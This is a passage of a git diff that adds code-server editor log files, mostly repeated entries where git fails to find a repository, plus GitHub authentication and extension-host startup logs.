boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:36:46.927 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:36:46.927 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:36:58.862 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 17:36:58.862 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:37:10.156 [info] > git rev-parse --show-toplevel [5ms] +2026-01-30 17:37:10.157 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:37:19.626 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:37:19.626 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:37:27.480 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 17:37:27.480 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:37:35.652 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 17:37:35.652 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:37:58.372 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:37:58.372 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:38:03.575 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:38:03.575 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:38:04.615 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:38:04.615 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:38:05.968 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:38:05.968 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:38:15.904 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:38:15.904 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:38:30.541 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:38:30.541 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:38:35.368 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:38:35.368 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:38:45.557 [info] > git rev-parse --show-toplevel [7ms] +2026-01-30 17:38:45.557 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:38:47.301 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:38:47.301 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:38:48.390 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:38:48.390 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:39:03.442 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 17:39:03.442 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:39:07.730 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:39:07.730 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:39:13.095 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:39:13.095 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:40:25.821 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:40:25.821 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:40:47.993 [info] > git rev-parse --show-toplevel [7ms] +2026-01-30 17:40:47.993 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:41:02.945 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 17:41:02.945 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:41:36.842 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 17:41:36.842 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:41:46.716 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 17:41:46.716 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:41:56.837 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:41:56.837 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:42:16.113 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:42:16.113 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:43:05.003 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:43:05.003 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:43:05.904 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:43:05.904 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:43:06.436 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 17:43:06.436 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:43:07.157 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:43:07.157 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:47:50.154 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 17:47:50.154 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:48:09.680 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:48:09.680 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:48:37.823 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:48:37.823 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:51:30.473 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:51:30.473 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:55:26.675 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:55:26.675 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:55:53.465 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:55:53.465 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 18:09:25.718 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 18:09:25.718 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:46:04.384 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 20:46:04.384 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:46:47.497 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 20:46:47.497 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:47:17.549 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 20:47:17.549 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:47:36.018 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 20:47:36.018 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:47:49.726 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 20:47:49.726 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:48:02.621 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 20:48:02.621 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:48:23.117 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 20:48:23.117 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:48:24.099 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 20:48:24.099 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:48:25.196 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 20:48:25.196 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:48:43.925 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 20:48:43.925 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:49:13.327 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 20:49:13.327 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:49:20.777 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 20:49:20.777 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:50:11.879 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 20:50:11.879 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:50:21.127 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 20:50:21.127 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:50:47.198 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 20:50:47.198 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:51:34.742 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 20:51:34.742 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:51:54.114 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 20:51:54.114 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:52:16.683 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 20:52:16.683 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:52:39.672 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 20:52:39.672 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:52:51.910 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 20:52:51.910 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:53:07.791 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 20:53:07.791 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:53:46.566 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 20:53:46.567 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:54:08.290 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 20:54:08.290 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 20:54:29.223 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 20:54:29.223 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 21:27:41.639 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 21:27:41.639 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 21:28:02.342 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 21:28:02.342 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 21:41:24.057 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 21:41:24.057 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 21:41:56.506 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 21:41:56.506 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 22:07:16.457 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 22:07:16.457 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 22:07:25.345 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 22:07:25.345 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 22:07:25.884 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 22:07:25.884 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 22:07:26.864 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 22:07:26.864 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 22:19:09.170 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 22:19:09.170 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:23:45.761 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 23:23:45.761 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:24:23.666 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 23:24:23.666 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:25:12.930 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 23:25:12.930 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:25:36.527 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 23:25:36.527 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:25:48.281 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 23:25:48.281 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:25:56.700 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 23:25:56.700 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:26:08.378 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 23:26:08.378 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:26:51.368 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 23:26:51.368 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:27:18.390 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 23:27:18.390 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:27:41.220 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 23:27:41.220 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:28:16.799 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 23:28:16.799 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:33:15.417 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 23:33:15.417 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:34:03.132 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 23:34:03.132 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:34:17.952 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 23:34:17.952 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:34:30.199 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 23:34:30.199 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:34:49.017 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 23:34:49.017 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:44:40.884 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 23:44:40.884 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:45:10.657 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 23:45:10.657 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:46:22.339 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 23:46:22.339 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:47:04.729 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 23:47:04.730 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 23:47:37.827 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 23:47:37.827 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 01:20:04.126 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 01:20:04.127 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 01:20:21.293 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 01:20:21.293 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..6473f77 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-30 17:35:16.704 [info] Reading sessions from keychain... +2026-01-30 17:35:16.704 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.704 [info] Got 0 sessions for ... +2026-01-30 17:35:16.704 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.704 [info] Got 0 sessions for ... +2026-01-30 17:35:16.704 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.704 [info] Got 0 sessions for ... +2026-01-30 17:35:16.704 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.704 [info] Got 0 sessions for ... +2026-01-30 17:35:16.704 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.704 [info] Got 0 sessions for ... +2026-01-30 17:35:16.704 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.704 [info] Got 0 sessions for ... +2026-01-30 17:35:16.704 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.704 [info] Got 0 sessions for ... +2026-01-30 17:35:16.704 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.704 [info] Got 0 sessions for ... +2026-01-30 17:35:16.704 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.704 [info] Got 0 sessions for ... +2026-01-30 17:35:16.712 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.712 [info] Got 0 sessions for ... +2026-01-30 17:35:16.743 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.743 [info] Got 0 sessions for ... +2026-01-30 17:35:16.743 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.743 [info] Got 0 sessions for ... +2026-01-30 17:35:16.743 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.743 [info] Got 0 sessions for ... +2026-01-30 17:35:16.743 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.743 [info] Got 0 sessions for ... +2026-01-30 17:35:16.743 [info] Getting sessions for all scopes... +2026-01-30 17:35:16.743 [info] Got 0 sessions for ... +2026-01-30 17:35:18.431 [info] Getting sessions for all scopes... +2026-01-30 17:35:18.431 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/vscode.github/GitHub.log new file mode 100755 index 0000000..9dddddd --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-30 17:35:16.895 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/vscode.markdown-language-features/Markdown.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/vscode.markdown-language-features/Markdown.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/remoteexthost.log new file mode 100755 index 0000000..7a539b8 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/remoteexthost.log @@ -0,0 +1,17 @@ +2026-01-31 09:15:36.572 [info] Extension host with pid 166721 started +2026-01-31 09:15:36.578 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-31 09:15:36.704 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-31 09:15:36.705 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-31 09:15:36.813 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-31 09:15:36.853 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-31 09:15:36.853 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-31 09:15:37.015 [info] Eager extensions activated +2026-01-31 09:15:37.016 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-31 09:15:37.016 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-31 09:15:37.270 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-31 09:15:54.321 [info] ExtensionService#_doActivateExtension vscode.extension-editing, startup: false, activationEvent: 'onLanguage:markdown' +2026-01-31 09:15:54.323 [info] ExtensionService#_doActivateExtension vscode.markdown-language-features, startup: false, activationEvent: 'onLanguage:markdown' +2026-01-31 09:15:54.838 [info] ExtensionService#_doActivateExtension vscode.markdown-math, startup: false, activationEvent: 'api', root cause: vscode.markdown-language-features +2026-01-31 10:53:10.496 [info] Extension host terminating: received terminate message from renderer +2026-01-31 10:53:10.497 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-31 10:53:10.533 [info] Extension host with pid 166721 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/vscode.git/Git.log new file mode 100755 index 0000000..fca4b93 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/vscode.git/Git.log @@ -0,0 +1,74 @@ +2026-01-31 09:15:37.062 [info] [main] Log level: Info +2026-01-31 09:15:37.062 [info] [main] Validating found git in: "git" +2026-01-31 09:15:37.062 [info] [main] Using git "2.39.5" from "git" +2026-01-31 09:15:37.062 [info] [Model][doInitialScan] Initial repository scan started +2026-01-31 09:15:37.062 [info] > git rev-parse --show-toplevel [4ms] +2026-01-31 09:15:37.062 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.062 [info] > git rev-parse --show-toplevel [3ms] +2026-01-31 09:15:37.062 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.062 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 09:15:37.062 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 